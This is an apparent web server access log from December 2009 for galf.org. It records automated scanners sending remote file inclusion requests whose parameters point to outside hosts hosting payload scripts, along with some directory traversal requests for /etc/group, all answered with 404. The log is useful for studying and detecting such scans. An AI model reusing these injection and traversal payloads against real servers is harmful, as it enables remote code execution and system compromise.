194.105.128.135 - - [20/Dec/2009:17:54:05 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
194.105.128.135 - - [20/Dec/2009:17:54:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [20/Dec/2009:17:55:00 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:55:00 -0800] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:17:55:01 -0800] "GET /logs/access_091012.log%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:55:05 -0800] "GET /logs//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:55:05 -0800] "GET /xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:55:05 -0800] "GET /logs/access_090921.log%20%20//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:17:55:10 -0800] "GET /logs/access_091109.log%20%20//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:17:55:16 -0800] "GET /logs/access_090921.log//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:17:55:16 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [20/Dec/2009:17:55:16 -0800] "GET /logs//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:55:49 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:55:49 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:55:49 -0800] "GET /logs/errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:55:59 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:56:00 -0800] "GET /logs/errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:56:00 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.101.73 - - [20/Dec/2009:17:56:07 -0800] "GET /viewbody.html?code=http://atthelake.info/english//bash/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.101.73 - - [20/Dec/2009:17:56:07 -0800] "GET /logs/access_091005.log//viewbody.html?code=http://atthelake.info/english//bash/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.101.73 - - [20/Dec/2009:17:56:07 -0800] "GET /logs//viewbody.html?code=http://atthelake.info/english//bash/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:17:56:10 -0800] "GET /logs/errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:17:56:10 -0800] "GET /errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:17:56:11 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:17:56:25 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:17:56:25 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:17:56:25 -0800] "GET /logs/access_090706.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [20/Dec/2009:17:56:27 -0800] "GET /logs//viewbody.html?code=http://www.lasummerteens.net//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [20/Dec/2009:17:56:27 -0800] "GET /viewbody.html?code=http://www.lasummerteens.net//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [20/Dec/2009:17:56:27 -0800] "GET /logs/access_091005.log//viewbody.html?code=http://www.lasummerteens.net//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.101.73 - - [20/Dec/2009:17:56:33 -0800] "GET /logs/access_090928.log//viewbody.html?code=http://atthelake.info/english//bash/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:17:56:38 -0800] "GET /common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:17:56:38 -0800] "GET /logs//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:17:56:38 -0800] "GET /logs/access_090921.log%20%20//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:56:42 -0800] "GET /errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:56:42 -0800] "GET /logs/errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [20/Dec/2009:17:56:42 -0800] "GET /logs/access_090921.log%20%20/errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [20/Dec/2009:17:56:54 -0800] "GET /logs/access_090928.log//viewbody.html?code=http://www.lasummerteens.net//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:17:57:13 -0800] "GET /logs/errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:17:57:14 -0800] "GET /logs/access.log/errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:17:57:14 -0800] "GET /errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:17:57:41 -0800] "GET /homepage.php?sel=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:17:57:41 -0800] "GET /homepage.php?sel=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:57:50 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:57:51 -0800] "GET /logs/access_091019.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:57:51 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:57:52 -0800] "GET /logs/access_091012.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:17:57:52 -0800] "GET /logs/access_090824.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:57:58 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:57:58 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:57:58 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:05 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:05 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:05 -0800] "GET /logs/access_091019.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:10 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.101.73 - - [20/Dec/2009:17:58:14 -0800] "GET /logs/access_090914.log//viewbody.html?code=http://atthelake.info/english//bash/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:16 -0800] "GET /logs/access_091012.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:41 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:42 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:42 -0800] "GET /logs/access_091019.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:17:58:42 -0800] "GET /logs/access_091012.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:17:58:50 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
217.196.64.12 - - [20/Dec/2009:17:59:13 -0800] "GET /logs/access_090914.log//viewbody.html?code=http://www.lasummerteens.net//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:18:00:33 -0800] "GET /logs/access_090921.log/errors.php?error=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:01:02 -0800] "GET /myevent.php?myevent_path=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:01:02 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:01:03 -0800] "GET /logs/myevent.php?myevent_path=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:01:24 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:01:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:01:24 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.101.73 - - [20/Dec/2009:18:01:32 -0800] "GET /logs/access_091005.log%20%20//viewbody.html?code=http://atthelake.info/english//bash/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.214.101.73 - - [20/Dec/2009:18:01:46 -0800] "GET /logs/access_090928.log%20%20//viewbody.html?code=http://atthelake.info/english//bash/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:01:48 -0800] "GET /logs/access_090803.log%20%20/myevent.php?myevent_path=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:01:49 -0800] "GET /logs/homepage.php?sel=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:01:49 -0800] "GET /logs/homepage.php?sel=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:02:05 -0800] "GET /logs/myevent.php?myevent_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:02:05 -0800] "GET /logs/access_091116.log%20%20/myevent.php?myevent_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:02:05 -0800] "GET /myevent.php?myevent_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:02:43 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.203.208.203 - - [20/Dec/2009:18:02:43 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.203.208.203 - - [20/Dec/2009:18:02:43 -0800] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [20/Dec/2009:18:02:45 -0800] "GET /logs/access_090803.log%20%20/myevent.php?myevent_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [20/Dec/2009:18:02:50 -0800] "GET /logs/access_091005.log%20%20//viewbody.html?code=http://www.lasummerteens.net//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.196.64.12 - - [20/Dec/2009:18:03:02 -0800] "GET /logs/access_090928.log%20%20//viewbody.html?code=http://www.lasummerteens.net//modules/Forums/admin/bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:06:38 -0800] "GET /logs/access_091116.log/myevent.php?myevent_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:06:47 -0800] "GET /logs/access_090803.log/myevent.php?myevent_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:07:48 -0800] "GET /logs/access_091116.log/myevent.php?myevent_path=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:08:01 -0800] "GET /logs/access_090803.log/myevent.php?myevent_path=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:18:08:07 -0800] "GET /logs//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:18:08:07 -0800] "GET /common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.152.145.54 - - [20/Dec/2009:18:08:07 -0800] "GET /logs/access_090921.log%20%20//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:18:09:04 -0800] "GET /xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [20/Dec/2009:18:09:04 -0800] "GET /logs//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [20/Dec/2009:18:09:04 -0800] "GET /logs/access.log//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.203.208.203 - - [20/Dec/2009:18:10:43 -0800] "GET /logs/access_090824.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:11:26 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
190.152.145.54 - - [20/Dec/2009:18:13:40 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:14:25 -0800] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:14:25 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:14:25 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [20/Dec/2009:18:14:28 -0800] "GET /logs/access_091109.log//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:14:31 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:14:31 -0800] "GET /logs/access.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:14:31 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
90.182.36.30 - - [20/Dec/2009:18:15:38 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:15:38 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:15:38 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:15:42 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:15:42 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:15:42 -0800] "GET /logs/access_090824.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.225.234 - - [20/Dec/2009:18:17:39 -0800] "GET /logs/access.log//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [20/Dec/2009:18:17:39 -0800] "GET /xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.225.234 - - [20/Dec/2009:18:17:39 -0800] "GET /logs//xfsection/modify.php?dir_module=http://vrim.org/bbs//script/idxx.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:19:25 -0800] "GET /logs/access.log//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:19:25 -0800] "GET /errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
196.40.83.71 - - [20/Dec/2009:18:19:26 -0800] "GET /logs//errors.php?error=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
209.97.212.123 - - [20/Dec/2009:18:20:09 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:18:20:09 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.216.203.109 - - [20/Dec/2009:18:20:09 -0800] "GET /logs/access_091012.log/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.urmary.ru//appserv/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:18:21:00 -0800] "GET /senetman/html/index.php?page=http://www.fileden.com/files/2009/12/18/2694332/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
